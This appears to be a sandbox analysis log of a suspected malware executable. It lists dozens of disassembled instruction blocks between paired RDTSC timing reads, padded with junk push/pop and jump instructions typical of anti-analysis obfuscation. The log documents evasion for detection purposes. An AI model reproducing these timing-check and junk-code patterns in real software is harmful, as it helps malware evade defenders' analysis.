Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74304FC second address: 7430555 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED52754Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b jmp 00007F1DED527556h 0x00000010 mov dword ptr [esi+04h], eax 0x00000013 jmp 00007F1DED527550h 0x00000018 mov dword ptr [esi+08h], eax 0x0000001b jmp 00007F1DED527550h 0x00000020 mov dword ptr [esi+0Ch], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 mov si, dx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430555 second address: 743055B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743055B second address: 743059B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+4Ch] 0x0000000b pushad 0x0000000c mov esi, 7E2C516Fh 0x00000011 pushfd 0x00000012 jmp 00007F1DED527554h 0x00000017 sbb al, FFFFFF98h 0x0000001a jmp 00007F1DED52754Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [esi+10h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov bx, si 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743059B second address: 74305C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1DECBA0FE9h 0x00000008 pop esi 0x00000009 mov esi, edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebx+50h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov cl, 17h 0x00000016 mov eax, edx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74305C8 second address: 7430627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1DED527558h 0x00000008 movzx ecx, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esi+14h], eax 0x00000011 pushad 0x00000012 call 00007F1DED527553h 0x00000017 jmp 00007F1DED527558h 0x0000001c pop esi 0x0000001d mov al, bh 0x0000001f popad 0x00000020 mov eax, dword ptr [ebx+54h] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 push edi 0x00000029 pop eax 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430627 second address: 7430638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DECBA0FDDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430638 second address: 743066C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b jmp 00007F1DED52754Dh 0x00000010 mov eax, dword ptr [ebx+58h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov edx, 760BC9EEh 0x0000001b call 00007F1DED52754Fh 0x00000020 pop eax 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743066C second address: 7430685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DECBA0FE5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430685 second address: 7430695 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+1Ch], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430695 second address: 7430699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430699 second address: 7430704 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1DED52754Fh 0x00000008 xor cx, 14AEh 0x0000000d jmp 00007F1DED527559h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov cx, 7537h 0x00000019 popad 0x0000001a mov eax, dword ptr [ebx+5Ch] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F1DED527558h 0x00000024 sub al, 00000058h 0x00000027 jmp 00007F1DED52754Bh 0x0000002c popfd 0x0000002d push eax 0x0000002e push edx 0x0000002f mov ecx, 582E28A5h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430704 second address: 7430724 instructions: 0x00000000 rdtsc 0x00000002 call 00007F1DECBA0FE2h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esi+20h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430724 second address: 743072C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, si 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743072C second address: 7430798 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+60h] 0x0000000c jmp 00007F1DECBA0FDEh 0x00000011 mov dword ptr [esi+24h], eax 0x00000014 jmp 00007F1DECBA0FE0h 0x00000019 mov eax, dword ptr [ebx+64h] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F1DECBA0FDEh 0x00000023 sub cx, 47A8h 0x00000028 jmp 00007F1DECBA0FDBh 0x0000002d popfd 0x0000002e movzx esi, di 0x00000031 popad 0x00000032 mov dword ptr [esi+28h], eax 0x00000035 pushad 0x00000036 push ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430798 second address: 74307DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov ebx, 052174EEh 0x0000000a popad 0x0000000b mov eax, dword ptr [ebx+68h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movzx ecx, di 0x00000014 pushfd 0x00000015 jmp 00007F1DED527553h 0x0000001a adc cl, 0000004Eh 0x0000001d jmp 00007F1DED527559h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74307DE second address: 74307EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DECBA0FDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74307EE second address: 74307FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+2Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74307FF second address: 7430803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430803 second address: 743081B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743081B second address: 743085D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 218737D4h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [ebx+6Ch] 0x0000000f jmp 00007F1DECBA0FE6h 0x00000014 mov word ptr [esi+30h], ax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F1DECBA0FE7h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743085D second address: 74308AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1DED52754Fh 0x00000009 or cl, 0000007Eh 0x0000000c jmp 00007F1DED527559h 0x00000011 popfd 0x00000012 movzx esi, di 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ax, word ptr [ebx+00000088h] 0x0000001f pushad 0x00000020 mov edi, 5DEAAA8Ch 0x00000025 popad 0x00000026 mov word ptr [esi+32h], ax 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d movsx ebx, ax 0x00000030 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74308AB second address: 74308B8 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 62C362CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74308B8 second address: 74308BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74308BC second address: 7430926 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1DECBA0FDCh 0x00000008 sbb ecx, 55507DD8h 0x0000000e jmp 00007F1DECBA0FDBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov eax, dword ptr [ebx+0000008Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov dx, 3EC6h 0x00000024 pushfd 0x00000025 jmp 00007F1DECBA0FE7h 0x0000002a add esi, 3DC12D4Eh 0x00000030 jmp 00007F1DECBA0FE9h 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430926 second address: 743092C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743092C second address: 74309E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+34h], eax 0x0000000e pushad 0x0000000f movzx ecx, bx 0x00000012 pushad 0x00000013 mov edx, 01C561C2h 0x00000018 call 00007F1DECBA0FE3h 0x0000001d pop eax 0x0000001e popad 0x0000001f popad 0x00000020 mov eax, dword ptr [ebx+18h] 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F1DECBA0FE5h 0x0000002a adc ax, C446h 0x0000002f jmp 00007F1DECBA0FE1h 0x00000034 popfd 0x00000035 pushad 0x00000036 jmp 00007F1DECBA0FDEh 0x0000003b pushfd 0x0000003c jmp 00007F1DECBA0FE2h 0x00000041 and ax, 8C18h 0x00000046 jmp 00007F1DECBA0FDBh 0x0000004b popfd 0x0000004c popad 0x0000004d popad 0x0000004e mov dword ptr [esi+38h], eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F1DECBA0FE5h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74309E8 second address: 7430A9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 jmp 00007F1DED527553h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+1Ch] 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F1DED527554h 0x00000017 add eax, 7DD36008h 0x0000001d jmp 00007F1DED52754Bh 0x00000022 popfd 0x00000023 mov ch, 06h 0x00000025 popad 0x00000026 mov dword ptr [esi+3Ch], eax 0x00000029 jmp 00007F1DED52754Bh 0x0000002e mov eax, dword ptr [ebx+20h] 0x00000031 pushad 0x00000032 call 00007F1DED527554h 0x00000037 mov ch, F1h 0x00000039 pop edi 0x0000003a push esi 0x0000003b pushfd 0x0000003c jmp 00007F1DED527553h 0x00000041 jmp 00007F1DED527553h 0x00000046 popfd 0x00000047 pop ecx 0x00000048 popad 0x00000049 mov dword ptr [esi+40h], eax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f push ecx 0x00000050 pop ebx 0x00000051 call 00007F1DED52754Ch 0x00000056 pop ecx 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430A9B second address: 7430AA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430AA1 second address: 7430AE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e jmp 00007F1DED527556h 0x00000013 push 00000001h 0x00000015 jmp 00007F1DED527550h 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e movsx edi, ax 0x00000021 mov al, A6h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430AE1 second address: 7430AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DECBA0FE7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430AFC second address: 7430B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430B00 second address: 7430B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1DECBA0FE4h 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1DECBA0FDAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430B2C second address: 7430B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430B30 second address: 7430B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430B36 second address: 7430B3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430B3B second address: 7430B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 43F7A769h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lea eax, dword ptr [ebp-10h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430B50 second address: 7430B61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED52754Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430B61 second address: 7430BAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1DECBA0FE3h 0x00000013 xor cl, FFFFFFAEh 0x00000016 jmp 00007F1DECBA0FE9h 0x0000001b popfd 0x0000001c push ecx 0x0000001d pop ebx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430BAE second address: 7430C0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 2E0Eh 0x00000007 pushfd 0x00000008 jmp 00007F1DED52754Fh 0x0000000d jmp 00007F1DED527553h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 pushad 0x00000018 movsx edx, cx 0x0000001b pushfd 0x0000001c jmp 00007F1DED527550h 0x00000021 xor ax, F7B8h 0x00000026 jmp 00007F1DED52754Bh 0x0000002b popfd 0x0000002c popad 0x0000002d nop 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430C0B second address: 7430C26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430C7C second address: 7430D18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b pushad 0x0000000c mov edx, ecx 0x0000000e popad 0x0000000f test edi, edi 0x00000011 jmp 00007F1DED527555h 0x00000016 js 00007F1E5BA25F5Bh 0x0000001c jmp 00007F1DED52754Eh 0x00000021 mov eax, dword ptr [ebp-0Ch] 0x00000024 jmp 00007F1DED527550h 0x00000029 mov dword ptr [esi+04h], eax 0x0000002c pushad 0x0000002d call 00007F1DED52754Eh 0x00000032 push eax 0x00000033 pop edx 0x00000034 pop ecx 0x00000035 mov edx, 1F907072h 0x0000003a popad 0x0000003b lea eax, dword ptr [ebx+78h] 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 mov di, si 0x00000044 pushfd 0x00000045 jmp 00007F1DED52754Eh 0x0000004a sbb ah, FFFFFF88h 0x0000004d jmp 00007F1DED52754Bh 0x00000052 popfd 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430DCE second address: 7430DDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430DDD second address: 7430E3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F1DED52754Ch 0x00000012 jmp 00007F1DED527555h 0x00000017 popfd 0x00000018 call 00007F1DED527550h 0x0000001d pushad 0x0000001e popad 0x0000001f pop ecx 0x00000020 popad 0x00000021 test edi, edi 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movzx eax, dx 0x00000029 mov dl, 1Dh 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430E3F second address: 7430E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DECBA0FDAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430E4D second address: 7430E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F1E5BA25DAAh 0x0000000e pushad 0x0000000f mov edx, 0D32E900h 0x00000014 mov ebx, 6E5D952Ch 0x00000019 popad 0x0000001a mov eax, dword ptr [ebp-04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F1DED52754Ch 0x00000026 or ch, 00000048h 0x00000029 jmp 00007F1DED52754Bh 0x0000002e popfd 0x0000002f mov esi, 36B03EBFh 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430E8F second address: 7430EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DECBA0FE0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430EA3 second address: 7430EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430EA7 second address: 7430EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1DECBA0FDAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430EBE second address: 7430ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DED52754Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430ED0 second address: 7430F0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+70h] 0x0000000e jmp 00007F1DECBA0FE6h 0x00000013 push 00000001h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1DECBA0FDAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430F0A second address: 7430F10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430F10 second address: 7430F16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430F16 second address: 7430F7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov ecx, 530E9561h 0x0000000f call 00007F1DED52754Eh 0x00000014 mov cx, 98D1h 0x00000018 pop ecx 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F1DED527559h 0x00000024 adc cl, FFFFFF96h 0x00000027 jmp 00007F1DED527551h 0x0000002c popfd 0x0000002d jmp 00007F1DED527550h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430F7D second address: 7430F95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bh, 94h 0x0000000f mov al, B2h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430F95 second address: 7430FD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c jmp 00007F1DED527550h 0x00000011 nop 0x00000012 pushad 0x00000013 mov si, B48Dh 0x00000017 mov ah, 0Ch 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov di, 4B54h 0x00000022 push ebx 0x00000023 pop eax 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743102F second address: 7431035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7431035 second address: 7431039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7431039 second address: 743103D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7431100 second address: 7431104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7431104 second address: 7431108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7431108 second address: 743110E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743110E second address: 7431163 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f pushfd 0x00000010 jmp 00007F1DECBA0FE1h 0x00000015 and cx, 6526h 0x0000001a jmp 00007F1DECBA0FE1h 0x0000001f popfd 0x00000020 popad 0x00000021 lock cmpxchg dword ptr [edx], ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7431163 second address: 7431192 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527552h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a jmp 00007F1DED527550h 0x0000000f test eax, eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7431192 second address: 7431196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7431196 second address: 74311B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
